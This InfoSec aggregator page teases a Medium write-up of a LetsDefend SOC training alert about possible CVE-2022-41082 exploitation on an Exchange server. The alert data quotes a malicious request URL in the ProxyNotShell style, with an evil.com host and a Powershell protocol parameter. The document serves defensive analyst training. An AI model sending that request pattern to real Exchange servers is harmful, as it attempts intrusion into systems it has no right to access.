all InfoSec news
SOC175 EventID:125 — PowerShell Found in Requested URL — Possible CVE-2022–41082 Exploitation —…
July 28, 2023, 6:41 p.m. | Enes Adışen
System Weakness - Medium systemweakness.com
SOC175 EventID:125 — PowerShell Found in Requested URL — Possible CVE-2022–41082 Exploitation — letsdefend.io
Before starting, you can see the data provided by the report alert below.
EventID :125
Event Time :Sep, 30, 2022, 07:19 AM
Rule :SOC175 - PowerShell Found in Requested URL - Possible CVE-2022-41082 Exploitation
Level :Security Analyst
Hostname :Exchange Server 2
Destination IP Address :172.16.20.8
Log Source :IIS
Source IP Address :58.237.200.6
Request URL :/@evil.com">autodiscover/autodiscover.json?@evil.com/owa/&Email=autodiscover/autodiscover.json%3f@evil.com&Protocol=XYZ&FooProtocol=Powershell
HTTP Method :GET
User-Agent :Mozilla/5.0 zgrab/0.x
Action :Blocked
Alert Trigger Reason …
alert blue team cve cve-2022-41082 data exchange exploitation letsdefendio powershell report security soc url
More from systemweakness.com / System Weakness - Medium
THM — Fortress
1 day, 14 hours ago |
systemweakness.com
Basic Password Checker in Python
2 days, 7 hours ago |
systemweakness.com
TryHackMe Linux Process Analysis Write-Up
3 days, 14 hours ago |
systemweakness.com
Cybersecurity ROI: Quantifying the Value of Protection
6 days, 13 hours ago |
systemweakness.com
Authentication & How it works ?
6 days, 13 hours ago |
systemweakness.com
Jobs in InfoSec / Cybersecurity
CyberSOC Technical Lead
@ Integrity360 | Sandyford, Dublin, Ireland
Cyber Security Strategy Consultant
@ Capco | New York City
Cyber Security Senior Consultant
@ Capco | Chicago, IL
Senior Security Researcher - Linux MacOS EDR (Cortex)
@ Palo Alto Networks | Tel Aviv-Yafo, Israel
Sr. Manager, NetSec GTM Programs
@ Palo Alto Networks | Santa Clara, CA, United States
SOC Analyst I
@ Fortress Security Risk Management | Cleveland, OH, United States